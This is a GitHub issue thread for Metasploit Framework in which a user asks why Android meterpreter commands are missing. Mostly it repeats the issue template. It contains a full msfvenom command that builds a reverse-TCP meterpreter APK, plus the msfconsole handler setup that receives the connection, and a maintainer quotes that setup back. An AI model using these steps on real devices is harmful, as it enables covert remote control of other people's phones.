### ISSUE TITLE
android commands missing meterpreter

### ISSUE THREAD

**Issue by manikantaraavi** [rapid7/metasploit-framework#11410]
## Steps to reproduce

How'd you do it?

1. ...
2. ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

What should happen?

## Current behavior

What happens instead?

You might also want to check the last ~1k lines of
`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or
`~/.msf4/logs/framework.log` for relevant stack traces

### Metasploit version

Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

What OS are you running Metasploit on?

**Comment by manikantaraavi** [comment]
please help me andriod commands missing in metasploit
thanks in advance
verison:v5.0.6-dev-

**Comment by bcoles** [comment]
## Steps to reproduce

How'd you do it?

1. ...
2. ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

What should happen?

## Current behavior

What happens instead?

You might also want to check the last ~1k lines of
`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or
`~/.msf4/logs/framework.log` for relevant stack traces


## System stuff

### Metasploit version

Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

What OS are you running Metasploit on?

**Comment by manikantaraavi** [comment]
i am using kali linux

**Comment by jmartin-r7** [comment]
@manikantaraavi, the PR template asks for details that are needed to reproduce the issue reported.  Please add all the details requested including steps required to recreate the issue.

**Comment by manikantaraavi** [comment]
i am using kali linux metasploit i up to date 
metasploit version 
Framework: 5.0.7-dev-
Console  : 5.0.7-dev-
please help me i am in bring trouble

**Comment by manikantaraavi** [comment]
i will create a apk using this command in metasploit 
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895 R > meterpreter.apk
And commands i use to exploit andriod 
*msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895
exploit*
And I am not getting Andriod Commands in msfconsole
These are the screenshots Below Attached 
please Help Me
![screenshot from 2019-02-22 14-09-17](https://user-images.githubusercontent.com/46994003/53230030-ba097400-36ab-11e9-9869-414f3ee45ffb.png)
![screenshot from 2019-02-22 14-09-29](https://user-images.githubusercontent.com/46994003/53229950-8c242f80-36ab-11e9-90a2-c37b09615dd2.png)
![screenshot from 2019-02-22 14-09-37](https://user-images.githubusercontent.com/46994003/53229951-8cbcc600-36ab-11e9-94c1-ec086d47e1c8.png)
![screenshot from 2019-02-22 14-09-44](https://user-images.githubusercontent.com/46994003/53229953-8d555c80-36ab-11e9-9998-dd41cd32bc13.png)

**Comment by timwr** [comment]
Are you sure you're inputting this:
```
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.104
set LPORT 4895
exploit
```
Into msfconsole?
The screenshots you've attached don't show that.
